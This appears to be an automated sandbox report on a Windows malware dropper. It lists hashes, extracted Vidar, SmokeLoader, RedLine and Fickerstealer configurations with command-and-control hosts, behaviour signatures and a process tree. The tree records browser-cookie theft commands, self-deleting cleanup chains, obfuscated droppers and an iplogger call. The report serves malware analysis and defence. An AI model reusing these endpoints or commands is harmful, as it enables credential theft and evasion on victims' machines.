Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    151s
  • max time network
    164s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-07-2021 18:06

General

  • Target

    8 (22).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2007

C2

37.1.219.52:6534

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 8 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2544
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1956
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2556
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2720
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2808
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2796
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1244
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:396
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:336
                      • C:\Users\Admin\AppData\Local\Temp\8 (22).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (22).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:764
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3960
                          • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3164
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3908
                              • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_3.exe
                                sonia_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                • Modifies system certificate store
                                PID:804
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                  6⤵
                                    PID:4744
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im sonia_3.exe /f
                                      7⤵
                                      • Kills process with taskkill
                                      PID:5304
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      7⤵
                                      • Delays execution with timeout.exe
                                      PID:6400
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1328
                                • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_4.exe
                                  sonia_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:3816
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:3328
                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:688
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5040
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1832
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4148
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4972
                                      • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        PID:4360
                                        • C:\Windows\winnetdriv.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626812488 0
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4620
                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4452
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 808
                                          8⤵
                                          • Program crash
                                          PID:4572
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 840
                                          8⤵
                                          • Program crash
                                          PID:1096
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 900
                                          8⤵
                                          • Program crash
                                          PID:208
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 964
                                          8⤵
                                          • Program crash
                                          PID:1124
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 968
                                          8⤵
                                          • Program crash
                                          PID:208
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 920
                                          8⤵
                                          • Program crash
                                          PID:4900
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1064
                                          8⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:5844
                                      • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4800
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 4800 -s 1004
                                          8⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5072
                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4604
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                          8⤵
                                            PID:1832
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2264
                                    • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:3180
                                      • C:\Users\Admin\Documents\_G5Em_uR02BWa7X4RkH58G5h.exe
                                        "C:\Users\Admin\Documents\_G5Em_uR02BWa7X4RkH58G5h.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:5088
                                      • C:\Users\Admin\Documents\xKY8wX0q0WmX7pJyCvqZ9Ldx.exe
                                        "C:\Users\Admin\Documents\xKY8wX0q0WmX7pJyCvqZ9Ldx.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4156
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5496
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                            PID:6128
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5964
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5664
                                        • C:\Users\Admin\Documents\LD_6T1m8aetYXkBQE5ykO8Jm.exe
                                          "C:\Users\Admin\Documents\LD_6T1m8aetYXkBQE5ykO8Jm.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4468
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm
                                            7⤵
                                              PID:3948
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd
                                                8⤵
                                                  PID:4648
                                                  • C:\Windows\SysWOW64\findstr.exe
                                                    findstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm
                                                    9⤵
                                                      PID:6084
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                      Sensitive.exe.com p
                                                      9⤵
                                                        PID:5416
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                          10⤵
                                                          • Executes dropped EXE
                                                          PID:6128
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                            11⤵
                                                            • Executes dropped EXE
                                                            PID:5524
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                              12⤵
                                                                PID:6216
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                                  13⤵
                                                                    PID:6376
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                                      14⤵
                                                                      • Drops startup file
                                                                      PID:6512
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 30
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:6084
                                                    • C:\Users\Admin\Documents\Gss4ozOK25SLm9TzG6MnxLtp.exe
                                                      "C:\Users\Admin\Documents\Gss4ozOK25SLm9TzG6MnxLtp.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4368
                                                      • C:\Users\Admin\Documents\Gss4ozOK25SLm9TzG6MnxLtp.exe
                                                        "C:\Users\Admin\Documents\Gss4ozOK25SLm9TzG6MnxLtp.exe" -a
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:3876
                                                    • C:\Users\Admin\Documents\JdhJGvIPUf_6KTkDEknt1Qrc.exe
                                                      "C:\Users\Admin\Documents\JdhJGvIPUf_6KTkDEknt1Qrc.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:4544
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                        7⤵
                                                          PID:1040
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            explorer https://iplogger.org/2LBCU6
                                                            8⤵
                                                              PID:2516
                                                            • C:\Windows\SysWOW64\regedit.exe
                                                              regedit /s adj.reg
                                                              8⤵
                                                              • Runs .reg file with regedit
                                                              PID:4224
                                                            • C:\Windows\SysWOW64\regedit.exe
                                                              regedit /s adj2.reg
                                                              8⤵
                                                              • Runs .reg file with regedit
                                                              PID:6092
                                                          • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                            "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:2392
                                                        • C:\Users\Admin\Documents\8aR4JaTbIVkzqzq9gnpxe7zT.exe
                                                          "C:\Users\Admin\Documents\8aR4JaTbIVkzqzq9gnpxe7zT.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:508
                                                          • C:\Users\Admin\Documents\8aR4JaTbIVkzqzq9gnpxe7zT.exe
                                                            C:\Users\Admin\Documents\8aR4JaTbIVkzqzq9gnpxe7zT.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4592
                                                        • C:\Users\Admin\Documents\vBNM2CHdJHq7kUurj6eNZwIw.exe
                                                          "C:\Users\Admin\Documents\vBNM2CHdJHq7kUurj6eNZwIw.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:380
                                                          • C:\Users\Admin\Documents\vBNM2CHdJHq7kUurj6eNZwIw.exe
                                                            "C:\Users\Admin\Documents\vBNM2CHdJHq7kUurj6eNZwIw.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:3020
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1436
                                                              8⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              PID:5384
                                                        • C:\Users\Admin\Documents\EFYF46wFbHLVpXtVifqUDiG9.exe
                                                          "C:\Users\Admin\Documents\EFYF46wFbHLVpXtVifqUDiG9.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:764
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            7⤵
                                                              PID:5740
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:4164
                                                          • C:\Users\Admin\Documents\fmgFXSWH4uh6RKTLFgb30wU9.exe
                                                            "C:\Users\Admin\Documents\fmgFXSWH4uh6RKTLFgb30wU9.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4448
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                              7⤵
                                                                PID:4212
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd
                                                                  8⤵
                                                                    PID:4816
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                      9⤵
                                                                        PID:6068
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                        Acre.exe.com k
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:2964
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          PID:4708
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            PID:4704
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                              12⤵
                                                                                PID:6200
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                  13⤵
                                                                                    PID:6336
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                      14⤵
                                                                                      • Drops startup file
                                                                                      PID:6488
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Runs ping.exe
                                                                            PID:5040
                                                                    • C:\Users\Admin\Documents\oky7kQhs9diHqS5xuzEjEIov.exe
                                                                      "C:\Users\Admin\Documents\oky7kQhs9diHqS5xuzEjEIov.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4216
                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                        C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:1504
                                                                        • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                          "{path}"
                                                                          8⤵
                                                                            PID:6280
                                                                      • C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                        "C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4188
                                                                        • C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5068
                                                                        • C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:1616
                                                                        • C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4580
                                                                        • C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          C:\Users\Admin\Documents\v6eNS8kKfVUbaPFMsyo9BkRT.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:2172
                                                                      • C:\Users\Admin\Documents\HkTrM4Rjg8HhniRgGMkx5CSP.exe
                                                                        "C:\Users\Admin\Documents\HkTrM4Rjg8HhniRgGMkx5CSP.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4252
                                                                        • C:\Users\Admin\Documents\HkTrM4Rjg8HhniRgGMkx5CSP.exe
                                                                          C:\Users\Admin\Documents\HkTrM4Rjg8HhniRgGMkx5CSP.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5080
                                                                      • C:\Users\Admin\Documents\6nvpl5ILJJGpiufgCOWtZhjy.exe
                                                                        "C:\Users\Admin\Documents\6nvpl5ILJJGpiufgCOWtZhjy.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        PID:4172
                                                                      • C:\Users\Admin\Documents\UR_qJq1cTIrjNhFknI7exs3e.exe
                                                                        "C:\Users\Admin\Documents\UR_qJq1cTIrjNhFknI7exs3e.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:4508
                                                                      • C:\Users\Admin\Documents\JVmIEFHNwfiqk53tXbIl5Sos.exe
                                                                        "C:\Users\Admin\Documents\JVmIEFHNwfiqk53tXbIl5Sos.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks processor information in registry
                                                                        PID:4404
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im JVmIEFHNwfiqk53tXbIl5Sos.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\JVmIEFHNwfiqk53tXbIl5Sos.exe" & del C:\ProgramData\*.dll & exit
                                                                          7⤵
                                                                            PID:4656
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im JVmIEFHNwfiqk53tXbIl5Sos.exe /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:6168
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:7108
                                                                        • C:\Users\Admin\Documents\OecCl_IOeNxP6SL2AXBkwVYI.exe
                                                                          "C:\Users\Admin\Documents\OecCl_IOeNxP6SL2AXBkwVYI.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4132
                                                                          • C:\Users\Admin\Documents\OecCl_IOeNxP6SL2AXBkwVYI.exe
                                                                            "C:\Users\Admin\Documents\OecCl_IOeNxP6SL2AXBkwVYI.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Checks processor information in registry
                                                                            PID:1636
                                                                        • C:\Users\Admin\Documents\ghhiOLqjS5zU_MESbBVQARFO.exe
                                                                          "C:\Users\Admin\Documents\ghhiOLqjS5zU_MESbBVQARFO.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:1308
                                                                          • C:\Users\Admin\Documents\ghhiOLqjS5zU_MESbBVQARFO.exe
                                                                            "C:\Users\Admin\Documents\ghhiOLqjS5zU_MESbBVQARFO.exe"
                                                                            7⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:2508
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                      4⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2156
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS87FE7DA4\sonia_6.exe
                                                                        sonia_6.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
